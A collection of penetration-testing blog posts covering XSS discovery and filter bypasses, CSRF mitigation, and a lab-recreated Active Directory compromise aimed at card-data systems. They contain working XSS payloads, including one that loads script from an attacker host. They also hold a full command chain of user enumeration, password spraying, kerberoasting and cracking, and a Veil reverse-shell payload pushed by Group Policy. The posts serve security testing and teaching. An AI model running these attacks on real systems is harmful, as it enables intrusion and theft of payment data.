Of course, editing their own link is fruitless, they would have to be passing the link onto their victim(s) in some way by sending it to via email, Facebook, Skype, etc …

What are the risks in this? Well The Web Application Hacker’s Handbook puts it better than I could:

web app hackers handbook quote

So, how can we defend against this? Well, you guessed it, the block directive:

X-XSS-Protection: 1; mode=block

So let’s try this again with that specified:

abused but blocked

So by specifying block we can prevent an attacker from crafting links that neutralise our existing script!

So in summary it is always good to specify block as by default XSS auditors only attempt to block what they think is being injected, which might not actually be the evil script itself.

Content Security Policy then?

Just to demo the difference, if we output a CSP header that prevents inline script and don’t attempt to inject anything:

CSP example image

Chrome shows us this is solely down to Content Security Policy:

csp chrome error

To get round this as site developers we can either specify the SHA-256 hash as described in our CSP, or simply move our code to a separate .js file as long as we white-list self in our policy. Any attacker injecting inline script will be foiled. Of course the problem with Content Security Policy is that it still seems to be an after-thought and trying to come up with a policy that fits an existing site is very hard unless your site is pretty much static. However, it is a great mitigation if done properly. Any weaknesses in the policy though may be ripe for exploitation. Hopefully I’ll have a post on that in the future if I come across it in any engagements.

*Yeh yeh, you’re not using X-XSS-Protection for evil, but lack of block of course, and if no-one has messed with the browser settings it is as though X-XSS-Protection: 1 has been output.

Hidden XSS

3 February 2018 at 15:16

On a recent web test I was having trouble finding any instances of cross-site scripting, which is very unusual.

However, after scanning the site with nikto, some interesting things came up:

$ nikto -h rob-sec-1.com
- ***** RFIURL is not defined in nikto.conf--no RFI tests will run *****
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          193.70.91.5
+ Target Hostname:    rob-sec-1.com
+ Target Port:        80
+ Start Time:         2018-02-03 15:37:18 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie v created without the httponly flag
+ Root page / redirects to: /?node_id=V0lMTCB5b3UgYmUgcmlja3JvbGxlZD8%3D
+ Server leaks inodes via ETags, header found with file /css, inode: 0x109c8, size: 0x56, mtime: 0x543795d00f180;56450719f9b80
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /css: This might be interesting...
+ OSVDB-3092: /test/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 4197 items checked: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2018-02-03 15:40:15 (GMT0) (177 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Particularly this:

+ OSVDB-3092: /test/: This might be interesting...

So I navigated to /test/ and saw this at the top of the page:

Test URL in browser

So the page had the usual content, however, there appeared to be some odd text at the top, and because it said NULL this struck me as some debug output that the developers had left in on the production site.

So to find out if this debug output is populated by any query string parameter, we can use wfuzz.

First we need to determine how many bytes come back from the page on a normal request:

$curl 'http://rob-sec-1.com/test/?' 1>/dev/null
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    53  100    53    0     0     53      0  0:00:01 --:--:--  0:00:01   289

Here we can see that this is 53. From there, we can configure wfuzz to try different parameter names and then look for any responses that have a size other than 53 characters. Here we’ll use dirb’s common.txt list as a starting point:

$ wfuzz -w /usr/share/wordlists/dirb/common.txt --hh 53 'http://rob-sec-1.com/test/?FUZZ=<script>alert("xss")</script>'
********************************************************
* Wfuzz 2.2.3 - The Web Fuzzer                         *
********************************************************

Target: HTTP://rob-sec-1.com/test/?FUZZ=<script>alert("xss")</script>
Total requests: 4614

==================================================================
ID	Response   Lines      Word         Chars          Payload    
==================================================================

02127:  C=200      9 L	       8 W	     84 Ch	  "item"

Total time: 14.93025
Processed Requests: 4614
Filtered Requests: 4613
Requests/sec.: 309.0369

Well, whaddya know, looks like we’ve found the parameter!

Will Smith

Copying /test/?item=<script>alert("xss")</script> into Firefox gives us our alert:

xss

ASP.NET Request Validation Bypass

14 October 2017 at 17:49

…and why you should report it (maybe).

This post is regarding the .NET Request Validation vulnerability, as described here. Note that this is nothing new, but I am still finding the issue prevalent on .NET sites in 2017.

Request Validation is an ASP.NET input filter.

This is designed to protect applications against XSS, even though Microsoft themselves state that it is not secure:

Even if you’re using request validation, you should HTML-encode text that you get from users before you display it on a page.

To me, that seems a bit mad. If you are providing users of your framework with functionality that mitigates XSS, why do users then have to do the one thing that mitigates XSS themselves?

Microsoft should have ensured that all .NET controls properly output things HTML encoded. For example, unless the developer manually output encodes the data in the following example then XSS will be introduced.

<asp:Repeater ID="Repeater2" runat="server">
  <ItemTemplate>
    <%# Eval("YourField") %>
  </ItemTemplate>
</asp:Repeater>

The <%: syntax introduced in .NET 4 was a good move for automatic HTML encoding, although it should have existed from the start.

Now to summarise, normally ASP.NET Request Validation blocks any HTTP request that appears to contain tags. e.g.

example.com/?foo=<b> would result in A potentially dangerous Request.QueryString value was detected from the client error, presented on a nice Yellow Screen of Death.

This is to prevent a user from inserting a <script> tag into user input, or from trying some other form such as <svg onload="alert(1)" />.

However, the flaw in this is that <%tag is allowed. This is a quirky tag that only works in Internet Explorer 9. But ironically not quirks mode, it requires IE9 standards mode so the top of the page must contain this Edit: It works in either mode, however if the page is in quirks mode then it requires user interaction (like mouseover). Example, the existing page can seen to be in quirks mode as it contains the following type definition and meta tag (although in tests only the meta tag seems to be required):

<!doctype html>
<meta http-equiv="X-UA-Compatible" content="IE=Edge">

I’ve setup an example here that you can try in IE9. The code is as follows:

<!doctype html>
<html>
<head>
	<meta http-equiv="X-UA-Compatible" content="IE=Edge">
</head>
<body>

	<%tag onmouseover="alert('markitzeroday.com')">Move mouse here

</body>
</html>

Loading your target page in Internet Explorer 9 and then viewing developer tools will show you whether the page is rendered in quirks mode.

Moving the mouse over the text gives our favourite notification from a computer ever - that which proves JavaScript execution has taken place:

XSS Proof

Edit: Actually this does work in quirks mode too using a CSS vector and no document type declaration:

<html>
<head>
</head>
<body>

        <%tag style="xss:expression(alert('markitzeroday.com'))">And you don't even have to mouseover

</body>
</html>

Example Warning: This is a trap, and you may need to hold escape to well… escape.

Now, you should report this in your pentest or bug bounty reports if you can prove JavaScript execution in IE9, either stored or reflected. Unfortunately it is not enough to bypass Request Validation in itself as XSS is an output vulnerability, not an input one.

Note that it is important that this is reported, even though it affects Internet Explorer 9 only. The reasons are as follows:

  • Some organisations are “stuck” on old versions of Internet Explorer for compatibility reasons. Their IT department will not upgrade the browsers network wide as a piece of software bought in 2011 for £150,000 will not run on anything else.
  • By getting XSS with one browser version, you are proving that adequate output encoding is not in place. This shows the application is vulnerable should it also use data from other sources. e.g. User input from a database shared with a non ASP.NET app, or an app that is written properly as not to rely on ASP.NET Request Validation.
    • Granted you can only test inputs from your “in-scope” applications and prove that those inputs have a vulnerable sink when output elsewhere, although chances are that if one part of the application is vulnerable then other parts will be and you can alert your client to this possibility quite literally.

Note also that Request Validation inhibits functionality. Much like my post on functional flaws vs security flaws, preventing a user from entering certain characters and then resolving this by issuing an HTTP 500 response results in a broken app. If such character sequences are not allowed, you should alert the user in a friendly way and give them chance to fix it first, even if this is only client-side validation. Also any automated processes that may include <stuff that it POSTs or GETs to your application may unexpectedly fail.

The thing that Microsoft got wrong with Request Validation is that XSS it an output problem, not an input problem. The Microsoft article linked above is still confused about this:

If you disable request validation, you must check the user input yourself for dangerous HTML or JavaScript.

Of course, if you want a highly secure site as your risk appetite is low, then do validate user input. Don’t let non alphanumeric characters be entered if they are not needed. However, the primary mitigation for XSS is output encoding. This is the act of changing characters like < to &lt;. Then it doesn’t matter if this is output to your page as the browser won’t execute it and therefore no XSS.

So as a pentester, report it if IE9 shows the alert, even if IE9 should be killed with fire. As a developer, turn Request Validation off and develop your application to HTML encode everywhere (don’t output into JavaScript directly - just don’t). If you need “extra” security, prevent non alphanumerics from being inserted into fields yourself through server-side validation.

XSS Without Dots

26 July 2017 at 20:02

A recent site that I pentested was echoing everything on the query string and POST data into a <div> tag.

e.g. example.php?monkey=banana gave

<div>
monkey => banana
</div>

I’m guessing this was for debugging reasons. So an easy XSS with

example.php?<script>alert(1)</script> gave

<div>
<script>alert(1)</script>
</div>

So I thought rather than just echoing 1 or xss I’d output the current cookie as a simple POC.

However, things weren’t as they seemed:

example.php?<script>alert(document.cookie)</script> gave

<div>
<script>alert(document_cookie)</script>
</div>

Underscore!? Oh well, I’ll just use an accessor to access the property:

example.php?<script>alert(document['cookie'])</script>. Nope:

<div>
<script>alert(document[
</div>

So thought the answer was to host the script on a remote domain:

example.php?<script src="//attacker-site.co.uk/sc.js"></script>:

<div>
<script_src="//attacker-site_co_uk/sc_js"></script>
</div>

Doh! Two problems….

A quick Google gave the answer to use %0C for the space:

example.php?<script%0Csrc="//attacker-site.co.uk/sc.js"></script>

And then to get the dots, we can simply HTML encode them as we are in an HTML context:

example.php?<script%0Csrc="//attacker-site&#46;co&#46;uk/sc&#46;js"></script>

which percent encoded is of course

example.php?<script%0Csrc="//attacker-site%26%2346%3bco%26%2346%3buk/sc%26%2346%3bjs"></script>

And this delivered the goods:

<div>
<script src="//attacker-site&#46;co&#46;uk/sc&#46;js"></script>
</div>

which the browser reads as

<script src="//attacker-site.co.uk/sc.js"></script>

And dutifully delivers our message box:

Alert

CSRF Mitigation for AJAX Requests

29 June 2017 at 11:34

To start with, a quick recap on what Cross-Site Request Forgery is:

  1. User is logged into their bank’s website: https://example.com.
  2. The bank website has a “money transfer” function: https://example.com/manage_money/transfer.do.
  3. The “money transfer” function accepts the following POST parameters: toAccount and amount.
  4. While logged into https://example.com the user receives an email from a person they think is their friend.
  5. The user clicks the link inside the email to access a cat video: https://attacker-site.co.uk/cats.htm.
  6. cats.htm whilst displaying said cat video, also makes a client-side AJAX request to https://example.com/manage_money/transfer.do POSTing the values toAccount=1234 and amount=100 transferring £100 to the attacker’s account from the victim.

Quick POC here that only POSTs to example.com and not your bank. Hopefully your bank already has CSRF mitigation in place. View source, developer console and Burp or Fiddler are your friends.

There’s a common misconception that websites can’t make cross-domain requests to other domains due to the Same Origin Policy. This could be due to the following being displayed within the browser console:

CORS Error

However, this is not the case. The request has been made, the browser message is telling you that the current origin (https://attacker-site.co.uk) simply cannot read any of the returned data from the cross-domain request. However, unlike an XSS attack, it doesn’t need to. The request has been made, and because the user is logged into the bank so therefore has a session cookie, this session cookie has been passed to the bank site authorising the transaction.

Quick Demo

Simulate the bank issuing a session cookie by creating our own in the browser:

Cookie Setup

Note we’ll set the Secure flag and HTTPOnly flags to show these have no effect on CSRF.

Visit the website:

Attacker Site CATS!

The following request is sent, note our session cookie is included:

Burp Request

Therefore as far as the web application is concerned, this is a legitimate request from the user to transfer the money despite the browser returning Cross-Origin Request Blocked. Only the response is blocked, not the original request.

AJAX Mitigation

If the target application has no CSRF mitigation in place, the above works for both AJAX requests and traditional form POSTs. This can be mitigated using the traditionally recommended Synchronizer Token Pattern. This involves creating a random, unpredictable token (in addition to the session token held in the cookie) and storing this server-side as a session variable. When a POST is made, this anti-CSRF token is also sent, but using any mechanism apart from cookies. This means that the anti-CSRF token will not be automatically included from the browser should the user follow a dodgy link that makes its own cross-domain request. CSRF averted.

But what if there was another way? One little known way is to include a custom header, such as X-Requested-With, as I answered here.

Basically:

  1. Set the custom header in every AJAX request that changes server-side state of the application. e.g. X-Requested-With: XmlHttpRequest.
  2. In each server-side method handler, ensure a CSRF check function is called.
  3. The CSRF function examines the HTTP request and checks that X-Requested-With: XmlHttpRequest is present as a header.
  4. If it is, it is allowed. If it isn’t, send an HTTP 403 response and log this server-side.

Many JavaScript frameworks such as JQuery will automatically send this header along with any AJAX requests. This header cannot be sent cross-domain:

  1. Any attempt to do so with a modern browser will trigger a CORS preflight request.
  2. Older browsers (think IE 8 and 9) can send cross-domain requests, but custom headers are not supported at all.
  3. Very old browsers cannot send cross-domain AJAX requests at all.

What is a Preflight?

So referring to the above old browsers couldn’t make cross-domain requests at all via AJAX. Therefore, you may get an old website that does check for a custom header server-side so that it knows it is an AJAX request. Now, the web is developed on the basis of “no breaking changes”. Therefore any new technologies introduced into the browser should not force websites to have to update themselves to continue working (why not visit the World Wide Web - apparently the world’s first website). This goes for functionality as well as security.

Therefore, suddenly allowing browsers to send cross-domain headers could break security if a site relies on this for CSRF mitigation. This scenario covers both points 2 and 3.

So that leaves 1, CORS (Cross-Origin Resource Sharing). CORS is a mechanism that weakens security. Its aim is to allow sites that trust one another to break the Same Origin Policy and read each others responses. e.g. api.example.org might allow example.org to make a cross-domain request and read the response in the browser, using the user’s session cookie as authorisation.

In a nutshell CORS does not prevent anything that used to be possible from happening. An example is a cross domain post using <form method="post"> has always been allowed, so therefore CORS allows any AJAX request that results in a previously possible HTTP request to be made, without a preflight request. This is because this has always been possible on the web and allowing AJAX to do this as well does not introduce any extra risk. However, a request with custom headers causes the browser to automatically send a request to the endpoint using the OPTIONS verb. If the server-side application recognises the OPTIONS request (i.e. it is CORS aware), it will reply with a header showing which headers will be allowed from the calling domain.

Here you can see the attempt to send X-Requested-With in a cross-domain POST results in an OPTIONS request requesting this header be allowed, rather than the actual request. This is the preflight.

OPTIONS verb

If the server-side is not explicitly configured to allow this (i.e. no Access-Control-Allow-Origin to allow the domain and no Access-Control-Allow-Headers to allow the custom header):

OPTIONS response

The header is not allowed because our example.com domain is not configured for CORS.

Therefore if CORS is not allowing the attacker’s domain to send extra headers, this mitigates CSRF.

Will This Work?

What To Look For When Pentesting

The above will only work if the server-side application is verifying that the custom header X-Requested-With is received in the request. As a pentester you should verify that all potentially discovered CSRF vulnerabilities are actually exploitable. Burp Suite allows this via right clicking an item then clicking Engagement tools > Create CSRF PoC. This may result in two things:

  1. If you weren’t aware of the above, you may find a POST request that first appeared vulnerable to CSRF (due to no tokens) however isn’t due to header checking.
  2. If, after having read this post, you find that an AJAX request is sending X-Requested-With: XmlHttpRequest you may find that removing this header still causes the “unsafe” action to take place server-side, therefore the request is vulnerable.

What To Do As A Developer

This may be a good short-cut if your server-side language of choice does not support server-side variables or if you do not want the extra overhead of storing an additional token per user session. However, make sure that the presence of the HTTP request header is verified for every handler that makes a change of state to your application. Aka, “unsafe” requests as defined by the RFC.

Remember, this only works for AJAX requests. If your application has to fall-back to full HTML requests if JavaScript is disabled, then this will not work for you. Custom headers cannot be sent via <form> tags.

Conclusion

This is a useful, easy to implement mitigation for CSRF. Although an attacker can easily add a custom header themselves (e.g. using Burp Suite), they can only do this to their own requests, not those of the victim as required in a client-side attack. There were vulnerabilities in Flash that allowed a custom-header to be added to a cross-domain request to another attacker’s site that set crossdomain.xml. Unlike HTML, Flash requires a crossdomain.xml file for any request, even those that are write only, such as CSRF. The trick here was for the attacker to issue a 307 HTTP redirect to redirect from their second attacker domain to the victim website. The bug in Flash carried over the custom header from the original request. However, as Flash is moribund, and this was a bug, I would say it is generally safe for most sites to rely on the presence of the header as a mitigation. However, if the risk appetite is low for the application in question, go with token mitigation instead of or as well: Defence-In-Depth.

Note that the Flash bug was fixed back in 2015.

XSS Hunting

3 March 2020 at 08:55

This post documents one of my findings from a bug bounty program. The program had around 20 web applications in scope. Luckily the first application I chose was a treasure trove of bugs, so that kept me busy for a while. When I decided to move on, I picked another one at random, which was the organisation’s recruitment application.

I found a cross-site scripting (XSS) vulnerability via an HTML file upload, but unfortunately the program manager marked this as a duplicate. In case you’re not familiar with bug bounties, this is because another researcher had found and logged the vulnerability with the program manager before me, and only the first submission on any valid bug is considered for reward.

After sifting through the site a few times, it appeared that all the low hanging fruit had gone. Time to bring out the big guns.

This time it’s in the form of my new favourite fuzzer ffuf.

ffuf -w /usr/share/wordlists/dirb/big.txt -u https://rob-sec-1.com/FUZZ -o Ffuf/Recruitment.csv -X HEAD -of csv

This is like the directory fuzzers of old, like dirb and dirbuster, however, it is written in Go, which is much much faster.

What this tool will do is try to enumerate different directories within the application, replacing FUZZ with items from the big.txt list of words. If we sneak peek a sample of this file:

$ shuf -n 10 /usr/share/wordlists/dirb/big.txt
odds
papers
diamonds
beispiel
comunidades
webmilesde
java-plugin
65
luntan
oldshop

…ffuf wil try URL paths such as https://rob-sec-1.com/odds, https://rob-sec-1.com/papers https://rob-sec-1.com/diamonds, etc, and report on what it finds. The -X parameter tells it to use the HEAD HTTP method, which will only retrieve HTTP headers from the target site rather than full pages. Usually retrieving HEAD will be enough to determine whether that hidden page exists or not. The thing I like most about ffuf, is the auto calibrate option, which determines “what is normal” for an application to return. I’ve not used this option here, but if you pass the -ac parameter (I don’t recommend this with -x HEAD), it will grab a few random URL paths of its own to see if the application follows the web standard of returning HTTP 404 errors for non-existent pages, or whether it returns something else. In the latter case, if something non-standard is returned, ffuf will often determine what makes this response unique, and tune its engine to only output results that are different than usual, and thus worthy of investigation. This will use page response size as one of the factors, which is the reason that I don’t recommend that -x HEAD is used, as this does not return the body nor its size, therefore auto calibration will be heavily restricted.

Anyway, back to the application. Ffuf running:

Ffuf runnung

Running the above generated the following CSV that we can read from the Linux terminal using the column command:

column -s, -t Ffuf/Recruitment.csv

Ffuf output

The result I have highlighted above jumped out at me. Third party tools deployed to a web application can be a huge source of vulnerabilities, as the code can often be dropped in without review, and as it is working, tends to get forgotten about and never updated. A quick Google revealed that this was in fact from a software package called ZeroEditor, and was probably not just a directory made on the site:

Google

Note that, as usual, I have anonymised and recreated the details of the application, the third party software, and the vulnerability in my lab. Details have been changed to protect the vulnerable. If you Google this you won’t find an ASP.NET HTML editor as the first result, and my post has nothing to do with the websites and applications that are returned.

From the third party vendor’s website I downloaded the source code that was available in a zip, and then used the following command to turn the installation directory structure into my own custom wordlist:

find . -type f > ../WebApp/ZeroEditor-Fuzz-All.txt

In this file I noticed lots of “non-dangerous” file types such as those in the “Images” directory, so I filtered this like so:

cat ZeroEditor-Fuzz-All.txt | grep -v 'Images' > ZeroEditor-Fuzz-No-Images.txt

Now we can see the top few lines from the non-filtered, and the filtered custom word lists for this editor:

Filter

Now we can run ffuf again, this time using the custom word list we made:

ffuf -w ZeroEditor-Fuzz-No-Images.txt -u https://rob-sec-1.com/ZeroEditor/FUZZ -o Ffuf/Recruitment-ZeroEditor-Fuzz.csv -X HEAD -of csv -H 'User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0' -t 1

This time we are only running one thread (-t 1), as from our earlier fuzzing we can tell the web app or its server isn’t really up to much performance wise, so in this instance we are happy to go slow.

Ffuf with Custom List

and we can show in columns as before:

Ffuf columnds with Custom List

My attention was drawn to the last two results. An ASPX - could there be something juicy in there? Also a Shockwave Flash file. I did actually decompile the latter, but it turned out just to be a standard Google video player, and I couldn’t find any XSS or anything else that interesting in the code.

Going back to Spell-Check-Dialog.aspx. What could we do here, with this discovered file?

Loading the page directly gave the following:

Spellchecker Page

Initially my go-to would have been param-miner, which can find hidden parameters like i did here using wfuzz. The difference is that param-miner is faster as it will try multiple parameters at once by employing a binary search, and it will also use an algorithmic approach for detecting differences in content without you having to specify what the baseline is (similar to Ffuf in this regard).

But we don’t need to do that as I already have the source code! I could do a code analysis to look for vulnerabilities ourselves.

Examining the code I found the following that reflected a parameter:

<asp:panel id="DialogFrame" runat="server" visible="False" enableviewstate="False">
            <iframe id="SpellFrame" name="SpellFrame" src="Spell-Check-Dialog.aspx?ZELanguage=<%=Request.Params["ZELanguage"]%>" frameborder="0" width="500" scrolling="no" height="340" style="width:500;height:340"></iframe>
        </asp:panel>

That is the code <%=Request.Params["ZELanguage"]%> outputs ZELanguage from the query string or POST data without doing the thing that mitigates cross-site scripting - output encoding.

However, when I went ahead and passed the query string for ZELanguage nothing happened:

https://rob-sec-1.com/ZeroEditor/Spell-Check-Dialog.aspx?ZELanguage=FOOBAR

No XSS

I guessed this could be due to the default visible="False" in the above asp:panel tag. After further examination I found the code to make DialogFrame visible:

  void Page_Init(object sender, EventArgs e)
    {
         // show iframe when needed for MD support
         if (Request.Params["MD"] != null)
         {
             this.DialogFrame.Visible = true;
             return;
         }         

In summary, it looked like I just needed to set MD to something as well. Hence from the hidden page I found the two hidden query string parameters: MD=true&ZELanguage=FOOBAR.

And reviewing the code to find out how it worked enabled me to construct the new query string:

https://rob-sec-1.com/ZeroEditor/Spell-Check-Dialog.aspx?MD=true&ZELanguage=FOOBAR"></iframe><script>alert(321)</script>

Bingo, XSS:

XSS

This would have been mitigated if the vendor had encoded on output: <%=Server.HTMLEncode(Request.Params["ZELanguage"]) %>

There was another file in the downloaded zip that if present could possibly have allowed Server-Side Request Forgery (SSRF) or directory traversal, however, this was not found during fuzzing of the target, suggesting it has been deleted after deployment. There were also some directory manipulation pieces of code within Spell-Check-Dialog.aspx that takes user input as part of the path, however, it doesn’t appear to be doing anything too crazy with the file and it also has a static file extension appended making it of limited use. That leaves us with XSS for now, and although I have found some more juicy findings on the bug bounty program, they are more difficult to recreate in a lab environment. It would be nice to release them should the program manager’s client allow this in future.

Timeline

  • 27 December 2019: Reported to the program manager.
  • 29 December 2019: Triaged by the program manager.
  • 03 March 2020: Reported to vendor of HTML Editor as it occurred to me to check whether the latest version was vulnerable when writing this post. A cursory glance suggested it was. No details of any vulnerable targets disclosed to vendor, as the code itself is vulnerable.
  • 28 April 2020: Rewarded $400 from bug bounty program.
  • TBA: Response from vendor.
  • 19 May 2020: Post last updated.

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

24 April 2019 at 20:02

This post details how to bypass firewalls to gain access to the Cardholder Data Environment (or CDE, to use the parlance of our times). End goal: to extract credit card data.

Without intending to sound like a Payment Card Industry (PCI) auditor, credit card data should be kept secure on your network if you are storing, transmitting or processing it. Under the PCI Data Security Standard (PCI-DSS), cardholder data can be sent across your internal network, however, it is much less of a headache if you implement network segmentation. This means you won’t have to have the whole of your organisation in-scope for your PCI compliance. This can usually be achieved by firewalling the network ranges dealing with card data, the CDE, from the rest of your organisation’s network.

Hopefully, the above should outline the basics of a typical PCI setup in case you are not familiar. Now onto the fun stuff.

The company I tested a few years ago had a very large network, all on the standard 10.0.0.0/8 range. Cardholder data was on a separate 192.168.0.0/16 range, firewalled from the rest of the company. Note that all details, including ranges have been changed for the purposes of this post. The CDE mostly consisted of call centre operatives taking telephone orders, and entering payment details into a form on an externally operated web application.

This was an internal test, therefore we were connected to the company’s internal office network on the 10.0.0.0/8 range. Scanning the CDE from this network location with ping and port scans yielded no results:

no-ping

no-ports

The ping scan is basically the same as running the ping command but nmap can scan a whole range with one run. The “hosts up” in the second command’s output relate to the fact we’ve given nmap the -Pn argument to tell it not to first ping, therefore nmap will report all hosts in the range as “up” even though they might not be (an nmap quirk).

So unless there was a firewall rule bypass vulnerability, or a weak password for the firewall that could be guessed, going straight in through this route seemed unlikely. Therefore, the first step of the compromise was to concentrate on taking control of Active Directory by gaining Domain Admin privileges.

Becoming Domain Admin

There are various ways to do this, such as this one in my previous post.

In this instance, kerberoast was utilised to take control of the domain. A walk through of the attack, starting off from a position of unauthenticated on the domain follows.

The first step in compromising Active Directory usually involves gaining access to any user account, at any level. As long as it can authenticate to the domain controller in some way, we’re good. In Windows world, all accounts should be able to authenticate with the domain controller, even if they have no permissions to actually do anything on it. At a most basic level, even the lowest privileged accounts need to validate that the password is correct when the user logs in, so this is a reason it works that way.

At this customer’s site, null sessions were enabled on the domain controller. In this case, our domain controller is 10.0.12.100, “PETER”. This allows the user list to be enumerated using tools like enum4linux, revealing the username of every user on the domain:

$ enum4linux -R 1000-50000 10.0.12.100 |tee enum4linux.txt

enum-started

enum-found

Now we have a user list, we can parse it into a usable format:

$ cat enum4linux.txt | grep '(Local User)' |awk '$2 ~ /MACFARLANE\\/ {print $2}'| grep -vP '^.*?\$$' | sed 's/MACFARLANE\\//g'

enum-extracted-users

You may have noticed I’m not into the whole brevity thing. Yes, you can accomplish this with awk, grep, sed and/or even Perl with many fewer characters, however, if I’m on a penetration test I tend to just use whatever works and save my brain power for achieving the main goal. If I’m writing a script that I’m going to use long term, I may be tempted to optimise it a bit, but for pentesting I tend to bash out commands until I get what I need (pun intended).

Now on the actual test. The network is huge, with over 25,000 active users. However, in my lab network we only have a handful, which should make it easier to demonstrate the hack.

Now we have the user list parsed into a text file, we can then use a tool such as CrackMapExec to guess passwords. Here we will guess if any of the users have “Password1” as their password. Surprisingly enough, this meets the default complexity rules of Active Directory as it contains three out of the four character types (uppercase, lowercase and number).

$ cme smb 10.0.12.100 -u users.txt -p Password1

Wow we have a hit:

cme-password-found

Note that if we want to keep guessing and find all accounts, we can specify the --continue-on-success flag:

cme-continue

So we’ve gained control of a single account. Now we can query Active Directory and bring down a list of service accounts. Service accounts are user accounts that are for… well… services. Think of things like the Microsoft SQL Server. When running, this needs to run under the context of a user account. Active Directory’s Kerberos authentication system can be used to provide access, and therefore a “service ticket” is provided by Active Directory to allow users to authenticate to it. Kerberos authentication is outside the scope of this post, however, this is a great write-up if you want to learn more.

Anywho, by requesting the list of Kerberos service accounts from the domain controller, we also get a “service ticket” for each. This service ticket is encrypted using the password of the service account. So if we can crack it, we will be able to use that account, which is usually of high privilege. The Impacket toolset can be used to request these:

$ GetUserSPNs.py -outputfile SPNs.txt -request 'MACFARLANE.EXAMPLE.COM/chuck:Password1' -dc-ip 10.0.12.100

spns

As we can see, one of the accounts is a member of Domain Admins, so this would be a great password to crack.

$ hashcat -m 13100 --potfile-disable SPNs.txt /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

After running hashcat against it, it appears we have found the plaintext password:

spn-cracked

To confirm that this is an actual active account, we can use CrackMapExec again.

$ cme smb 10.0.12.100 -u redrum -p 'murder1!'

spn-user-da

Wahoo, the Pwn3d! shows we have administrator control over the domain controller.

OK, how to use it to get at that lovely card data?

Now, unfortunately for this company, the machines the call centre agents were using within the CDE to take phone orders were on this same Active Directory domain. And although we can’t connect to these machines directly, we can now tell the domain controller to get them to talk to us. To do this we need to dip into Group Policy Objects (GPOs). GPOs allow global, or departmental, settings to be applied to both user and computers. Well, it’s more than that really, however, for the purposes of this post you just need to know that it allows control of computers in the domain on a global or granular level.

Many of the functions of GPO are used to manage settings of the organisational IT. For example, setting a password policy or even setting which desktop icons appear for users (e.g. a shortcut to open the company’s website). Another GPO allows “immediate scheduled tasks” to be run. This is what we’re doing here… Creating a script which will run in the call centre, and connect back to the our machine, giving us control. Here are the steps to accomplish this:

  1. Generate a payload. Here we’re using Veil Evasion. Our IP address is 10.0.12.1, so we’ll point the payload to connect back to us at this address.
    $ veil -t EVASION -p 22 --ip 10.0.12.1 --port 8755 -o pci_shell veil

  2. Login to the domain controller over Remote Desktop Protocol (RDP), using the credentials we have from kerberoasting.
    rdp

  3. Find the CDE in Active Directory. From our knowledge of the organisation, we know that the call centre agents work on floor 2. We notice Active Directory Users and Computers (ADUC) has an OU of this name:
    aduc-floor2

  4. Drop in the script we made from Veil into a folder, and share this on the domain controller. Set permissions on both the share and the directory to allow all domain users to read.
    dc-share

  5. Within GPO, we create a policy at this level:
    gpo-1

  6. Find the Scheduled Tasks option while editing this new GPO, and create a new Immediate Scheduled Task:
    gpo-2

  7. Create the task to point to the version saved in the share. Also set “Run in logged-on user’s security context” under “common”.
    task

Done!

I waited 15 minutes and nothing happened. I know that group policy can take 90 minutes, plus or minus 30 to update, but I was thinking that at least one machine would have got the new policy by now (note, if testing this in a lab you can use gpupdate /force). Then I waited another five. I was just about to give up and change tack, then this happened:

meterpreter-opened

Running the command to take a screenshot, returned exactly what the call centre agent was entering at the time… card data!:

card-data

Card data was compromised, and the goal of the 11.3 PCI penetration test was accomplished.

If we have a look at the session list, we can see that the originating IP is from the 192.168.0.0/16 CDE range:

metasploit-sessions

On the actual test the shells just kept coming, as the whole of the second floor sent a shell back. There was something in the region of 60-100 Meterpreter shells that were opened.

Note that Amazon is used in my screenshot, which is nothing to do with the organisation I’m talking about. In the real test, a script was setup in order to capture screenshots upon a shell connecting (via autorunscript), then we could concentrate on the more interesting sessions, such as those that were part way through the process and were about to reach the card data entry phase.

There are other ways of getting screenshots like use espia in Meterpreter, and Metasploit’s post/windows/gather/screen_spy.

There are methods of doing the GPO programatically, which I have not yet tried such as New-GPOImmediateTask in PowerView.

The mitigation for this would to always run the CDE on its own separate Active Directory domain. Note that not even a forest is fine. Of course, defence-in-depth measures of turning off null sessions, encouraging users to select strong passwords and making sure that any service accounts have crazy long passwords (20+ characters, completely random) are all good. Also detecting if any users go and request all service tickets in one go, or creating a honeypot service account that could be flagged if anyone requests the service ticket could help too. No good keeping card holder data safe if a hacker can get to the rest of your organisation.

Password Autocomplete and Modern Browsers

8 July 2018 at 16:26

On many penetration test reports (including mine), the following is reported:


Password Field With Autocomplete Enabled

The page contains a form with the following action URL:

https://rob-sec-1.com/blog/autocomplete.php

The form contains the following password field with autocomplete enabled:

password

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application. The stored credentials can be captured by an attacker that gains control over the user’s computer. Further, an attacker that finds a separate application vulnerability such as cross-site scripting may be able to exploit this to retrieve a user’s browser-stored credentials.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, include the attribute autocomplete=”off” within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields). Please note that modern web browsers may ignore this directive. In spite of this there is a chance that not disabling autocomplete may cause problems obtaining PCI compliance.



Now this one is an awkward one to report, because saving passwords for the user is a good thing. MDN says on the matter:

in-browser password management is generally seen as a net gain for security. Since users do not have to remember passwords that the browser stores for them, they are able to choose stronger passwords than they would otherwise.

I completely agree with this. Password managers (even browser built-in ones) are better than using the same passwords across all sites, or subtle variations on one (monkey1Facebook, monkey1Twitter, etc.).

Users should have their local devices protected (by this I mean mobile devices and desktop machines). This means a password, PIN or fingerprint or equivalent to login, and encryption enabled (FDE, like BitLocker, or device enabled, like Android encryption), to prevent anything being extracted from the file system.

